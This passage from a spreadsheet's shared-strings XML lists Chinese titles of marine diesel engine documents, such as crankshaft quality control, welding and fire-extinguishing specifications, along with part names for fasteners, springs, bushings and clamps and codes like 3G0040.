    <t xml:space="preserve">曲轴形位公差                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴标准                                              </t>
  </si>
  <si>
    <t xml:space="preserve">运动件校中测隙                                           </t>
  </si>
  <si>
    <t xml:space="preserve">往复部件找中接受标准                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴承首次供应质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴链质量控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座对中和安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴和飞轮安装说明                                        </t>
  </si>
  <si>
    <t xml:space="preserve">机架梁和箱体调整                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头导板对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">长贯穿螺栓装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承与连杆安装                                        </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱装配                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套壳体安装说明                                        </t>
  </si>
  <si>
    <t xml:space="preserve">前端链条装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气集管装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制轴安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">ALPHA气缸润滑生产建议                                     </t>
  </si>
  <si>
    <t xml:space="preserve">气缸对中安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拆除基架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座机架对中                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导板重新对中                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油水试验                                              </t>
  </si>
  <si>
    <t xml:space="preserve">动车试验                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油漆说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">A级运输方案                                            </t>
  </si>
  <si>
    <t xml:space="preserve">B级运输方案                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器技术数据                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器/汽水分离器座                                        </t>
  </si>
  <si>
    <t xml:space="preserve">推力+主轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器外形                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转子平衡图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">转子环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">转子记号                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扩压器记号                                             </t>
  </si>
  <si>
    <t xml:space="preserve">球轴承安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">水管接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">流体指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">项目安排                                              </t>
  </si>
  <si>
    <t xml:space="preserve">水洗阀安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涂层说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器芯子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">LKS装配图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器芯子组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">插芯横梁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器固定工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">干洗装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">通用船规质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺柱拧紧质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢修补QC规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">灰铸铁修补                                             </t>
  </si>
  <si>
    <t xml:space="preserve">活塞裙质量无损检验                                         </t>
  </si>
  <si>
    <t xml:space="preserve"> 铸造质量数字代码                                         </t>
  </si>
  <si>
    <t xml:space="preserve">铸铁微观结构检查                                          </t>
  </si>
  <si>
    <t xml:space="preserve">单独的铸件拉力试验                                         </t>
  </si>
  <si>
    <t xml:space="preserve">十字头超负荷质量试验                                        </t>
  </si>
  <si>
    <t xml:space="preserve">缸套质量控制                                            </t>
  </si>
  <si>
    <t xml:space="preserve">MC.S34MNV焊接曲轴质量规范                                 </t>
  </si>
  <si>
    <t xml:space="preserve">焊接曲轴曲柄质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">L55曲轴焊接检查                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管质量规范                                           </t>
  </si>
  <si>
    <t xml:space="preserve">锻造曲轴质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铸钢轴承座技术条件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">离心铸造缸套质量控制                                        </t>
  </si>
  <si>
    <t xml:space="preserve">铸造缸套质量控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套首次制造质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头焊接要求                                           </t>
  </si>
  <si>
    <t xml:space="preserve">锻造缸盖体质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">锻造十字头质量控制                                         </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆火焰硬化质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座硬化质量规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴调整生产建议                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄维修                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲拐喷砂清洗生产规范                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦巴氏合金                                           </t>
  </si>
  <si>
    <t xml:space="preserve">白合金首次制造质量控制                                       </t>
  </si>
  <si>
    <t xml:space="preserve">锥形螺钉安装生产建议                                        </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆火焰硬化生产建议                                       </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆火焰硬化                                           </t>
  </si>
  <si>
    <t xml:space="preserve">表面硬化生产规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MC.S34MNV焊接曲轴生产规                                  </t>
  </si>
  <si>
    <t xml:space="preserve">MC.S20MO焊接曲轴                                      </t>
  </si>
  <si>
    <t xml:space="preserve">L55.S36S焊接曲轴                                      </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头焊接规程                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴焊接维修-金属弧焊                                       </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴焊接维修-埋弧焊                                        </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头堆焊                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架内部焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座内部焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄磁粉检查报告                                          </t>
  </si>
  <si>
    <t xml:space="preserve">毛坯尺寸检查                                            </t>
  </si>
  <si>
    <t xml:space="preserve">成品尺寸检查                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管理规范                                              </t>
  </si>
  <si>
    <t xml:space="preserve">技术规格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接电缆线路图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄焊接车间认证要求                                        </t>
  </si>
  <si>
    <t xml:space="preserve">后端部分管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">绘图说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">4L35MC-S基础图                                       </t>
  </si>
  <si>
    <t xml:space="preserve">基础座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">发动机/发电机设计                                         </t>
  </si>
  <si>
    <t xml:space="preserve">电站设计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">刮油设计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">刮油系统设计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">进风管质量                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油，燃油，空气供应                                       </t>
  </si>
  <si>
    <t xml:space="preserve">备用辅助设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚珠轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器对中                                         </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器清单                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫器箱火焰探测                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱CO2灭火                                          </t>
  </si>
  <si>
    <t xml:space="preserve">粉末灭火系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽灭火                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱水雾灭火                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管路图布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油压力调整                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发动机部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">X射线检查装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">各种改进管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">球阀清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管系隔热层                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油加热管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管，加热                                            </t>
  </si>
  <si>
    <t xml:space="preserve">三通考克清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">布置清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油管-非冷却阀                                        </t>
  </si>
  <si>
    <t xml:space="preserve">电气元件连接图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">信号源设备连接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扳手清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机上管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直通考克清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器清单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">单向阀清单                                             </t>
  </si>
  <si>
    <t xml:space="preserve">仪表接口清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">通用仪表清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接符号说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管道布置详细资料                                          </t>
  </si>
  <si>
    <t xml:space="preserve">试验旋塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">细滤器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">膜片支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">金属丝                                               </t>
  </si>
  <si>
    <t>3G0040</t>
  </si>
  <si>
    <t>3G0041</t>
  </si>
  <si>
    <t>3G0042</t>
  </si>
  <si>
    <t>3G0043</t>
  </si>
  <si>
    <t>3G0049</t>
  </si>
  <si>
    <t>3G0060</t>
  </si>
  <si>
    <t>3G0062</t>
  </si>
  <si>
    <t>3G0066</t>
  </si>
  <si>
    <t>3G0067</t>
  </si>
  <si>
    <t>3G0069</t>
  </si>
  <si>
    <t>3G0070</t>
  </si>
  <si>
    <t>3G0102</t>
  </si>
  <si>
    <t>3G0112</t>
  </si>
  <si>
    <t>3G0134</t>
  </si>
  <si>
    <t>3G0206</t>
  </si>
  <si>
    <t>3G0930</t>
  </si>
  <si>
    <t>3G1000</t>
  </si>
  <si>
    <t>3G1002</t>
  </si>
  <si>
    <t>3G1020</t>
  </si>
  <si>
    <t>3G1021</t>
  </si>
  <si>
    <t>3G1023</t>
  </si>
  <si>
    <t>3G1024</t>
  </si>
  <si>
    <t>3G1026</t>
  </si>
  <si>
    <t>3G1027</t>
  </si>
  <si>
    <t>3G1030</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱顶部铸件                                           </t>
  </si>
  <si>
    <t>3G1031</t>
  </si>
  <si>
    <t>3G1033</t>
  </si>
  <si>
    <t>3G1034</t>
  </si>
  <si>
    <t>3G1080</t>
  </si>
  <si>
    <t>3G1081</t>
  </si>
  <si>
    <t>3G1082</t>
  </si>
  <si>
    <t>3G1083</t>
  </si>
  <si>
    <t>3G1084</t>
  </si>
  <si>
    <t>3G1085</t>
  </si>
  <si>
    <t>3G1086</t>
  </si>
  <si>
    <t>3G1100</t>
  </si>
  <si>
    <t>3G1102</t>
  </si>
  <si>
    <t>3G1200</t>
  </si>
  <si>
    <t>3G1210</t>
  </si>
  <si>
    <t>3G1212</t>
  </si>
  <si>
    <t>3G1216</t>
  </si>
  <si>
    <t>3G1218</t>
  </si>
  <si>
    <t>3G1220</t>
  </si>
  <si>
    <t>3G1222</t>
  </si>
  <si>
    <t>3G1224</t>
  </si>
  <si>
    <t>3G1228</t>
  </si>
  <si>
    <t>3G1248</t>
  </si>
  <si>
    <t>3G1260</t>
  </si>
  <si>
    <t>3G1262</t>
  </si>
  <si>
    <t>3G1280</t>
  </si>
  <si>
    <t>3G1282</t>
  </si>
  <si>
    <t>3G1290</t>
  </si>
  <si>
    <t>3G2105</t>
  </si>
  <si>
    <t>3G2125</t>
  </si>
  <si>
    <t>3G2126</t>
  </si>
  <si>
    <t>3G2127</t>
  </si>
  <si>
    <t>3G2145</t>
  </si>
  <si>
    <t>3G2200</t>
  </si>
  <si>
    <t>3G2203</t>
  </si>
  <si>
    <t>3G2213</t>
  </si>
  <si>
    <t>3G2214</t>
  </si>
  <si>
    <t>3G2217</t>
  </si>
  <si>
    <t>3G2218</t>
  </si>
  <si>
    <t>3G2220</t>
  </si>
  <si>
    <t>3G2221</t>
  </si>
  <si>
    <t>3G2320</t>
  </si>
  <si>
    <t>3G2321</t>
  </si>
  <si>
    <t>3G2345</t>
  </si>
  <si>
    <t>3G2349</t>
  </si>
  <si>
    <t>3G2400</t>
  </si>
  <si>
    <t>3G2402</t>
  </si>
  <si>
    <t>3G2403</t>
  </si>
  <si>
    <t>3G2436</t>
  </si>
  <si>
    <t>3G2440</t>
  </si>
  <si>
    <t>3G2515</t>
  </si>
  <si>
    <t>3G2520</t>
  </si>
  <si>
    <t>3G2530</t>
  </si>
  <si>
    <t>3G2535</t>
  </si>
  <si>
    <t>3G3021</t>
  </si>
  <si>
    <t>3G3028</t>
  </si>
  <si>
    <t>3G3067</t>
  </si>
  <si>
    <t>3G3069</t>
  </si>
  <si>
    <t>3G3087</t>
  </si>
  <si>
    <t>3G3088</t>
  </si>
  <si>
    <t>3G3120</t>
  </si>
  <si>
    <t>3G3121</t>
  </si>
  <si>
    <t xml:space="preserve">检查阀                                               </t>
  </si>
  <si>
    <t>3G3125</t>
  </si>
  <si>
    <t>3G3140</t>
  </si>
  <si>
    <t>3G3141</t>
  </si>
  <si>
    <t>3G3206</t>
  </si>
  <si>
    <t>3G3218</t>
  </si>
  <si>
    <t>3G3219</t>
  </si>
  <si>
    <t>3G3244</t>
  </si>
  <si>
    <t>3G3245</t>
  </si>
  <si>
    <t>3G3249</t>
  </si>
  <si>
    <t>3G3254</t>
  </si>
  <si>
    <t>3G3312</t>
  </si>
  <si>
    <t>3G3314</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器法兰                                            </t>
  </si>
  <si>
    <t>3G3334</t>
  </si>
  <si>
    <t>3G3335</t>
  </si>
  <si>
    <t>3G3338</t>
  </si>
  <si>
    <t>3G3339</t>
  </si>
  <si>
    <t>3G3343</t>
  </si>
  <si>
    <t>3G3344</t>
  </si>
  <si>
    <t>3G3345</t>
  </si>
  <si>
    <t>3G3346</t>
  </si>
  <si>
    <t>3G3364</t>
  </si>
  <si>
    <t>3G3365</t>
  </si>
  <si>
    <t>3G3409</t>
  </si>
  <si>
    <t>3G3410</t>
  </si>
  <si>
    <t>3G3412</t>
  </si>
  <si>
    <t>3G3413</t>
  </si>
  <si>
    <t>3G3417</t>
  </si>
  <si>
    <t>3G3431</t>
  </si>
  <si>
    <t>3G3433</t>
  </si>
  <si>
    <t>3G3436</t>
  </si>
  <si>
    <t>3G3438</t>
  </si>
  <si>
    <t>3G3440</t>
  </si>
  <si>
    <t xml:space="preserve">十字头定位控制                                           </t>
  </si>
  <si>
    <t>3G3441</t>
  </si>
  <si>
    <t>3G3450</t>
  </si>
  <si>
    <t>3G3478</t>
  </si>
  <si>
    <t>3G3504</t>
  </si>
  <si>
    <t>3G3509</t>
  </si>
  <si>
    <t>3G3510</t>
  </si>
  <si>
    <t>3G3511</t>
  </si>
  <si>
    <t>3G3512</t>
  </si>
  <si>
    <t>3G3540</t>
  </si>
  <si>
    <t>3G3542</t>
  </si>
  <si>
    <t>3G3600</t>
  </si>
  <si>
    <t>3G3601</t>
  </si>
  <si>
    <t>3G3605</t>
  </si>
  <si>
    <t>3G3654</t>
  </si>
  <si>
    <t>3G3655</t>
  </si>
  <si>
    <t>3G3702</t>
  </si>
  <si>
    <t>3G3804</t>
  </si>
  <si>
    <t>3G3808</t>
  </si>
  <si>
    <t>3G3824</t>
  </si>
  <si>
    <t>3G3828</t>
  </si>
  <si>
    <t>3G3844</t>
  </si>
  <si>
    <t>3G3848</t>
  </si>
  <si>
    <t>3G3864</t>
  </si>
  <si>
    <t>3G3868</t>
  </si>
  <si>
    <t>3G5048</t>
  </si>
  <si>
    <t>3G5049</t>
  </si>
  <si>
    <t>3G5083</t>
  </si>
  <si>
    <t>3G5085</t>
  </si>
  <si>
    <t>3G5088</t>
  </si>
  <si>
    <t>3G5089</t>
  </si>
  <si>
    <t>3G5114</t>
  </si>
  <si>
    <t>3G5202</t>
  </si>
  <si>
    <t>3G5250</t>
  </si>
  <si>
    <t>3G5252</t>
  </si>
  <si>
    <t>3G5254</t>
  </si>
  <si>
    <t>3G5262</t>
  </si>
  <si>
    <t>3G5264</t>
  </si>
  <si>
    <t>3G9000</t>
  </si>
  <si>
    <t>3G9003</t>
  </si>
  <si>
    <t>3G9007</t>
  </si>
  <si>
    <t>3G9010</t>
  </si>
  <si>
    <t>3G9011</t>
  </si>
  <si>
    <t>3G9200</t>
  </si>
  <si>
    <t>3G9220</t>
  </si>
  <si>
    <t xml:space="preserve">角球形接头                                             </t>
  </si>
  <si>
    <t>3G9280</t>
  </si>
  <si>
    <t xml:space="preserve">带螺母的角球形接头                                         </t>
  </si>
  <si>
    <t>3G9281</t>
  </si>
  <si>
    <t xml:space="preserve">轴，工具端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴，轴向振动测量仪                                         </t>
  </si>
  <si>
    <t xml:space="preserve">开口销-圆柱形                                           </t>
  </si>
  <si>
    <t xml:space="preserve">开口销-特殊圆柱形                                         </t>
  </si>
  <si>
    <t xml:space="preserve">槽形销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀件清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">爪盘接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">摩擦联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">套筒联轴节                                             </t>
  </si>
  <si>
    <t xml:space="preserve">法兰式联轴节                                            </t>
  </si>
  <si>
    <t xml:space="preserve">结合件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铰链接合                                              </t>
  </si>
  <si>
    <t xml:space="preserve">单臂钳                                               </t>
  </si>
  <si>
    <t xml:space="preserve">单杠杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">单叉杠杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">各种杠杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">双臂                                                </t>
  </si>
  <si>
    <t xml:space="preserve">焊接手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">各种手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺丝杆，销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">手柄球                                               </t>
  </si>
  <si>
    <t xml:space="preserve">手轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">牙形碟片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外链节                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内链节                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链条销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链条表格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">梨形环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链节                                                </t>
  </si>
  <si>
    <t xml:space="preserve">各种链条和链节                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钥匙环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">V形带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">齿形带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">环形钢索钳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">心形套管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝轧头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">右旋压紧弹簧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">左旋压紧弹簧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">矩形压缩弹簧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">碟形弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧，扩展                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧钳                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹接套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">紧配凸圆头螺钉                                           </t>
  </si>
  <si>
    <t xml:space="preserve">紧配带工具螺纹螺钉                                         </t>
  </si>
  <si>
    <t xml:space="preserve">紧配六角螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒扳手头紧配螺钉                                         </t>
  </si>
  <si>
    <t xml:space="preserve">六角法兰螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中空尖角螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">尖角插入螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">特殊螺纹螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管接头螺母和螺塞                                          </t>
  </si>
  <si>
    <t xml:space="preserve">特殊头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管接头螺母和插销                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸圆头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带槽螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内六角螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带槽自攻螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">六角自攻螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平锥头螺钉                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内六角或内方孔螺钉                                         </t>
  </si>
  <si>
    <t xml:space="preserve">翼形螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">尖角螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中心销                                               </t>
  </si>
  <si>
    <r>
      <t>紧配螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                      </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">紧配螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">渐缩柱头螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不等螺距柱头螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">三螺纹柱头螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">双头螺纹柱头螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">长/短螺纹柱头螺栓                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压延伸柱头螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">单头螺纹柱头螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹的限位销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">无螺纹限位销                                            </t>
  </si>
  <si>
    <t xml:space="preserve">全螺纹柱头螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">有涨圈槽柱头螺栓                                          </t>
  </si>
  <si>
    <t xml:space="preserve">特殊柱头螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母贴合面垫圈                                         </t>
  </si>
  <si>
    <t xml:space="preserve">限位六角螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">六角管接头螺母                                           </t>
  </si>
  <si>
    <t xml:space="preserve">自锁六角螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">特殊六角螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带垫圈的圆形螺母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">带锁紧环圆形螺母                                          </t>
  </si>
  <si>
    <t xml:space="preserve">圆形帽螺母                                             </t>
  </si>
  <si>
    <r>
      <t>圆螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                           </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">特殊圆形螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管状螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">专用圆螺母                                             </t>
  </si>
  <si>
    <t xml:space="preserve">蝶形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">方形螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">有眼螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外表面锥形衬套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带限位圈的筒形衬套                                         </t>
  </si>
  <si>
    <t xml:space="preserve">箝位轴衬                                              </t>
  </si>
  <si>
    <t xml:space="preserve">光滑的筒形衬套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外表面有边衬套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">弹性衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自润滑衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带限位圈自润滑衬套                                         </t>
  </si>
  <si>
    <t xml:space="preserve">非金属自润滑衬套                                          </t>
  </si>
  <si>
    <t xml:space="preserve">普通圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">斜切式圆盘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外凹圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内凹圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带切口圆盘                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凹形圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管状逆电流器，直的                                         </t>
  </si>
  <si>
    <t xml:space="preserve">管状逆电流器，插座式                                        </t>
  </si>
  <si>
    <t xml:space="preserve">普通有边圆盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测试5                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凹形有边圆盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">特殊锁板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">多孔有边圆盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">薄板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">孔板                                                </t>
  </si>
  <si>
    <r>
      <t>带孔圆盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">已加工圆板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">已加工带角的板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带X状网格的有耳垫圈                                        </t>
  </si>
  <si>
    <t xml:space="preserve">矩形锁板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆形锁板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴定位环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹性挡圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锯齿锁紧垫圈                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧锁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">挡圈                                                </t>
  </si>
  <si>
    <t xml:space="preserve">特殊锁紧装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">张力夹板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">木块加工圆盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">木块加工方盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">木块加工角盘                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定管夹                                              </t>
  </si>
  <si>
    <t xml:space="preserve">软管夹                                               </t>
  </si>
  <si>
    <t xml:space="preserve">特殊夹具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管夹箍                                               </t>
  </si>
  <si>
    <t xml:space="preserve">组合材料夹具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">夹箍（两半）                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱形磁铁                                             </t>
  </si>
  <si>
    <t xml:space="preserve">矩形磁铁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆头铆钉                                              </t>
  </si>
